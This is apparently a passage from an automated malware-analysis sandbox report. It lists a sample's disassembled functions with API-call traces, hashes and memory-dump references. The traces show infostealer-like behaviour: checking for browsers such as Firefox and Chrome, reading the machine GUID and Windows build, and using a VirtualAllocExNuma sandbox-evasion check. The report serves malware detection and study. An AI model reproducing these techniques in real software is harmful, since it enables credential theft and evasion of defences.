                                                                                                                                                                        • Opcode Fuzzy Hash: 1c3bd6ac4ef41956937a902ddb009b3509decb157d4b6cffb7b397c4212c3e18
                                                                                                                                                                        • Instruction Fuzzy Hash: AB21BE32E00215AFCF22BF74EC468AE7FB8AF24304B544065F819E7152DB39DE058B90
                                                                                                                                                                        Function 0018EA91 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 290COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • StrCmpCA.SHLWAPI(0094C481), ref: 0018EACE
                                                                                                                                                                        • StrCmpCA.SHLWAPI(0094C481), ref: 0018EB2B
                                                                                                                                                                        • StrCmpCA.SHLWAPI(0094C481,firefox), ref: 0018EDF2
                                                                                                                                                                        • StrCmpCA.SHLWAPI(0094C481), ref: 0018EC08
                                                                                                                                                                          • Part of subcall function 001904EE: lstrcpyA.KERNEL32(00000000,?,?,00181D07,?,00197663), ref: 0019050D
                                                                                                                                                                        • StrCmpCA.SHLWAPI(0094C481), ref: 0018ECB8
                                                                                                                                                                        • StrCmpCA.SHLWAPI(0094C481), ref: 0018ED15
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcpy
                                                                                                                                                                        • String ID: Stable\$ Stable\$firefox
                                                                                                                                                                        • API String ID: 3722407311-2697854757
                                                                                                                                                                        • Opcode ID: 9e8016a9f248b33fb593b2fa64ce9910f5d89a17dd96a7ae356060884291f47b
                                                                                                                                                                        • Instruction ID: 0c45b7766a015c300ca9df5e2d73b735fda4d47c07776a44c1bc668d93dd9f45
                                                                                                                                                                        • Opcode Fuzzy Hash: 9e8016a9f248b33fb593b2fa64ce9910f5d89a17dd96a7ae356060884291f47b
                                                                                                                                                                        • Instruction Fuzzy Hash: F4B15632D00109AFCF21FFA8ED47A9DBBB5AF64310F554160F914AB251DB30AF598B92
                                                                                                                                                                        Function 001915A9 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 48registryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _memset.LIBCMT ref: 001915DC
                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 001915FB
                                                                                                                                                                        • RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 00191620
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?), ref: 0019162C
                                                                                                                                                                        • CharToOemA.USER32(?,?), ref: 00191640
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CharCloseOpenQueryValue_memset
                                                                                                                                                                        • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                                                                                                        • API String ID: 2235053359-1211650757
                                                                                                                                                                        • Opcode ID: 2618e36372a0d6bca2caf58052c6a0fdf8cb6c71fbb16e6761d854a49ac00fee
                                                                                                                                                                        • Instruction ID: f188c7ea36ac209c02cf17a63d4a8073a671ea2379cb081b73db3c7f7ef880ff
                                                                                                                                                                        • Opcode Fuzzy Hash: 2618e36372a0d6bca2caf58052c6a0fdf8cb6c71fbb16e6761d854a49ac00fee
                                                                                                                                                                        • Instruction Fuzzy Hash: 601121B590121DAFDB11EF60ED89EEABBBCEB14304F0001E5F615E6052D7749E888F10
                                                                                                                                                                        Function 00190B05 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40registrymemoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00193ED5,Windows: ,001B68A8), ref: 00190B19
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,00193ED5,Windows: ,001B68A8), ref: 00190B20
                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,001B6890,?,?,?,00193ED5,Windows: ,001B68A8), ref: 00190B4E
                                                                                                                                                                        • RegQueryValueExA.KERNEL32(001B6890,00000000,00000000,00000000,000000FF,?,?,?,00193ED5,Windows: ,001B68A8), ref: 00190B6A
                                                                                                                                                                        • RegCloseKey.ADVAPI32(001B6890,?,?,?,00193ED5,Windows: ,001B68A8), ref: 00190B73
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                        • String ID: Windows 11
                                                                                                                                                                        • API String ID: 3466090806-2517555085
                                                                                                                                                                        • Opcode ID: f1d4fdbf116669f5554fdd3e5737c8ef8651217cf906e4f0b4b82bb32e371113
                                                                                                                                                                        • Instruction ID: 7a427ca7ac8f4800c7a6d1821f21d27b441b7374d7bcd822c4822bb2483c620c
                                                                                                                                                                        • Opcode Fuzzy Hash: f1d4fdbf116669f5554fdd3e5737c8ef8651217cf906e4f0b4b82bb32e371113
                                                                                                                                                                        • Instruction Fuzzy Hash: 1DF0FF79641304FFEF126BA1EC4AFAE7F6DEB48B05F140165F602AA1A0D7B19940DB60
                                                                                                                                                                        Function 00190B7E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36registrymemoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00190BF0,00190B2D,?,?,?,00193ED5,Windows: ,001B68A8), ref: 00190B92
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,00190BF0,00190B2D,?,?,?,00193ED5,Windows: ,001B68A8), ref: 00190B99
                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,001B6890,?,?,?,00190BF0,00190B2D,?,?,?,00193ED5,Windows: ,001B68A8), ref: 00190BB7
                                                                                                                                                                        • RegQueryValueExA.KERNEL32(001B6890,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,00190BF0,00190B2D,?,?,?,00193ED5,Windows: ), ref: 00190BD2
                                                                                                                                                                        • RegCloseKey.ADVAPI32(001B6890,?,?,?,00190BF0,00190B2D,?,?,?,00193ED5,Windows: ,001B68A8), ref: 00190BDB
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                        • String ID: CurrentBuildNumber
                                                                                                                                                                        • API String ID: 3466090806-1022791448
                                                                                                                                                                        • Opcode ID: b1e295de4484ce3682ab72ff3f1cc6d7fd7cd7482740744fee10a8221b524d21
                                                                                                                                                                        • Instruction ID: b4fe1734f7f7a3ddc3c0cdb56a00b849555b79b5e4bc5b8037126b258136fffe
                                                                                                                                                                        • Opcode Fuzzy Hash: b1e295de4484ce3682ab72ff3f1cc6d7fd7cd7482740744fee10a8221b524d21
                                                                                                                                                                        • Instruction Fuzzy Hash: DEF0307A641304FBFB12AB91EC4AFAE7F7DEB44B05F140155F601AA0A0D7B199409B10
                                                                                                                                                                        Function 00187FAC Relevance: 9.1, APIs: 6, Instructions: 60filememoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0018E72B,?,?,?), ref: 00187FC7
                                                                                                                                                                        • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0018E72B,?,?,?), ref: 00187FDE
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0018E72B,?,?,?), ref: 00187FF5
                                                                                                                                                                        • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0018E72B,?,?,?), ref: 0018800C
                                                                                                                                                                        • LocalFree.KERNEL32(0018EC91,?,?,?,?,0018E72B,?,?,?), ref: 0018802B
                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,0018E72B,?,?,?), ref: 00188034
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2311089104-0
                                                                                                                                                                        • Opcode ID: b877848f237db1f8f7fc003e79249ea23f3435d25cbe3a8afb2f4cd0b92a3e08
                                                                                                                                                                        • Instruction ID: ca5c0a3f3aeca3895c3333f0d84d48f627fc18a7e5006b888e94eb381e3fde3d
                                                                                                                                                                        • Opcode Fuzzy Hash: b877848f237db1f8f7fc003e79249ea23f3435d25cbe3a8afb2f4cd0b92a3e08
                                                                                                                                                                        • Instruction Fuzzy Hash: 62115874901204EFDF22AFA4ED88EAE7FB8EB44781F600549F851EA190DB719B85DF11
                                                                                                                                                                        Function 0019172C Relevance: 9.1, APIs: 6, Instructions: 58commemoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 00191733
                                                                                                                                                                        • CoCreateInstance.OLE32(001B31B0,00000000,00000001,001BAF60,?,00000018,001918D6,?), ref: 00191756
                                                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 00191763
                                                                                                                                                                        • _wtoi64.MSVCRT ref: 00191796
                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 001917AF
                                                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 001917B6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: String$Free$AllocCreateH_prolog3_catchInstance_wtoi64
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 181426013-0
                                                                                                                                                                        • Opcode ID: c74b80f3d7f63c19a5843d2d139c03d03454b16b060e54c4c6f20d0e26cf383a
                                                                                                                                                                        • Instruction ID: 33220f280da694858d8e454154c254377680326b9c55ce606bb24d24fee9b00b
                                                                                                                                                                        • Opcode Fuzzy Hash: c74b80f3d7f63c19a5843d2d139c03d03454b16b060e54c4c6f20d0e26cf383a
                                                                                                                                                                        • Instruction Fuzzy Hash: 7911197590424AEFCF059FE8C8989AEBBB6FF49310F54416DF215E7250DB318986CB60
                                                                                                                                                                        Function 001810F0 Relevance: 9.1, APIs: 6, Instructions: 54memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,001E5D70,00003000,00000004), ref: 001810AA
                                                                                                                                                                        • _memset.LIBCMT ref: 001810D0
                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 001810E6
                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,0019850E), ref: 00181100
                                                                                                                                                                        • VirtualAllocExNuma.KERNEL32(00000000), ref: 00181107
                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00181112
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
